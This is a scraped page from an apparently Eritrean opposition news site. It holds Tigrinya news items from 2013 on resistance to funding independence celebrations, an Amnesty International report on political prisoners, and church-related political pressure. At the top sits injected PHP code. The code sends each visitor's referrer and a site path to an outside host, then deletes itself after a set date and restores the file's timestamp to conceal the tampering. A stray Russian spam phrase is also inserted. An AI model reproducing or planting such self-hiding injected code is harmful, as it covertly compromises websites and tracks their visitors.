check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ህዝብና ንጽምብል 24 ግንቦት ገንዘብ ኣየዋጽን ክብል ይቓወም ኣሎ።
кремлевская диета

ህዝብና ንጽምብል 24 ግንቦት ገንዘብ ኣየዋጽን ክብል ይቓወም ኣሎ።

User Rating: / 0
PoorBest 

 

 

 

 

 

 

10 ሚያዝያ 2013

ህዝብና ንጽምብል 24 ግንቦት ገንዘብ ኣየዋጽን ክብል ይቓወም ኣሎ።

ምንጭታት ወጋሕታ ሳሊና ዝሰደዱልና ሓበሬታ ከምዘነጸሮ ህዝብና ንጽምብል 24 ግንቦት ገንዘብ ከዋጽእ ብህግደፍ ንዝወረደሉ መምርሒ ዳንኬራ ክንገብር  ኣይደልን መዓዝ ጥዒሙና ብምባል ይቓወሞሎ።

ህግደፍ ኣብ ዓዲዃላ ንጽምብል 24 ግንቦት ገንዘብ ኣዋጽኡ ኢሉ ዘውረዶ መምርሒ ተነጺጉ ስለዝተረፈ ደጊሙ ንሰብ ትካላት ይሓትት ከምዘሎ ድማ ሓበሬታ ምንጭታትና ብኣብነት ይገልጽ።

ነዚ መምርሒ ንምውራድ  ኢሉ ህግደፍ ዝጸውዖም ኣኼባታትውን ህዝቢ እናተረፈ ስለዝኣበየ ክካየዱ ከምዘይክኣሉ ሓበሬታ ምንጭታትና ወሲኹ የረጋግጽ።

------------------------------------------///////////--------------------------------

10 ግንቦት 2013

ብኣሸሓት ዝቑጸሩ ኤርትራውያን ናይ ፖለቲካ እሱራት ፍትሒ ሓሪሙዎም ኣብ ዘሰቅቅ ኩነታት ከምዘለዉ ኣምነስቲ ኢንተርናሽናል ገሊጹ።

ኣምነስቲ ኢንተርናሽናል ዕላዊ ኣብ ዝገበሮ ሪፖርት ኤርትራ ኣብ ትሕቲ ኢሳይያስ ኣፍወርቂ ኣብ ዘሕለፈቶም 20 ዓመታት ብውሑድ 10 ሺሕ ዜጋታት ብፖለቲካዊ ምክንያት ኣደዳ ማእሰርትን ስቃይን ከምዝኾኑዋ ኣረጋጊጹ።

ሕጂውን ብኣሸሓት ዝቑጸሩ ኤርትራውያን ናይ ፖለቲካ እሱራት ብዘይፍርዲ ኣብ ማእሰርቲ ተዳጕኖም ዘሰቅቅ ሃለዋት የሕልፉ ከምዘለዉ እቲ ሪፖርት የነጽር።

ኣካይዳ መንግስቲ ዝወቐሱ፡ ብኣስገዳድ ንዝፍጸም ወተሃደራዊ ዕስክርና ዝተቃወሙን ዶብ ሰጊሮም ክሃድሙ ዝፈተኑን ገለ ካብቶም ክትግምቶ ዘጸግም ዓይነት ሃለዋት ዘሕልፉ ዘለዉ ኤርትራውያን ምዃኖም ድማ ሓቢሩ።

እዞም ኤርትራውያን እሱራት ኣበይ ከምዘለዉ ንስድርኦም ኣይንገርን ብዝወጽዎ ሃለዋቶም ዝስእንሉ ኣጋጣሚውን ብዙሕ ይብል እቲ ሪፖርት።

እዚ ዘስካሕክሕ ግፍዒ እሱራት- ትሕቲ ምድርን ኮንተይነራትን ኣብ ዝተደኮና ኣብያተ ማእሰርቲ ዝፍጸም ዝበለ ኣምነስቲ ኢንተርናሽናል ብዓቐሊ ጽበት ናይ ዝፍጸም ርእሰ ቅትለትን ብዘስካሕክሕ ኣተሓሕዛ ሂወቶም ናይ ዝስእኑን ኤርትራውያን ሪፖርት ከምዝበጽሖውን ገሊጹሎ።

ሓደ ኣብ ባረንቱ ተኣሲሩ ዝነበረ ኤርትራዊ 2.5 3 ሜትሮ ኣብ ዝኾነትን ቦሎፎና ኣዝዩ ዝተሓተን ገዛ 33 ሰባት ተኣሲርና 50 ዲግሪ ሴንትግሬድ ኣብ ዘለዎ ሙቐት መስኮት ተዓጽዩ ሃለዋትና ዘስካሕክሕ ክኸውን ተፈሪዱና ክብል ንኣምነስቲ ምግላጹውን እቲ ሪፖርት ኣስፊሩዎዩ።

ኤርትራ ጽምብል ናጽነታ ከተኽብር ትሽባሸብ ተሃለወት ሃለዋት ዜጋታት ግን ኩለንተናዊ ናጽነት ዝሓርበቶ ከምዝኾና እቲ ሪፖርት ወሲኹ ገሊጹዩ።

-----------------------------------///////////---------------------------------------

 

10 ግንቦት 2013

ስርዓት ህግደፍ ብሃይማኖት ኣመሳሚሱ ኤርትራውያን ንምንብርካኽ ዝገብሮ ዘሎ ምንቅስቓስ ክምከት ኤርትራውያን ደለይቲ ፍትሒ ጸዊዖም።

መርበብ ሓበሬታ ኣሰና ዘወሃሃደቶ ዜና ከምዝሓበሮ ስርዓት ህግደፍ ብዩፍታሄ ወዲቐሺ ደሜጥሮስ ኣብ እትምራሕ ተዋህዶ ቤተክርስትያን ኤርትራ ብሃይማኖት እናመሳመሰ ዝገብሮ ዘሎ ኢድ ኣእታውነት ብጥብቂ ክኹነን ኣብ እስራኤል ዝርከቡ ኤርትራውያን ደለይቲ ፍትሒ ጸዊዖም ኣለዉ።

ስርዓት ህግደፍ ባዕሉ ብዝመዘዞም ፓትርያሪክ ኦርቶዶክስ ተዋህዶ ኤርትራ ኣቡነ ዲዮስቆሮስ ኣባ ሰላማን ኣባቄርሎስን ዝተብሃሉ ጳጳሳት ኣቢሉ ሕቡእ ፖለቲካዊ ኣጀንድኡ ይነዝሕን የፈራርሕን ምህላዉውን ተጠቒሱሎ።

እዞም በቲ ስርዓት ዝተኸተቡ ኣቕሽቲን ዲያቆናትን ኢና በሃልቲ ዕሱባት ኣብ እስራኤል ንዝነብሩ ኣገልገልቲ ቤተክርስተያን ኣስማቶም ብምምዝጋብ ኣብ ዝግበር ስነስርዓት ምቕባል ኣቡነ ዲዮስቆሮስ እንተዘይተሳቲፎም  ካብ እስራኤል ክስጎጉ ከም ዝኾኑን ብኤርትራ ድማ ተቐባልነት ከምዘይህሉዎምን ብምንጋር  የፈራርሕዎም ምህላዎም እታ  መርበብ ሓበሬታ ወሲኻ ገሊጻላ።

ኤርትራውያን ነበርቲ እስራኤል ነዚ ብሃይማኖት እናመሳመስካ ዝግበር ፖለቲካዊ ምንቅስቓስ ብኣግኡ ክምክትዎን ሓደገኛ ሳዕቤኑ ኣለልዮም ወጊድ ክብልዎን ድማ እቶም ደለይቲ ፍትሒ ጸዊዖም ኣለዉ።

----------------------------------------/////////////-----------------------------

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player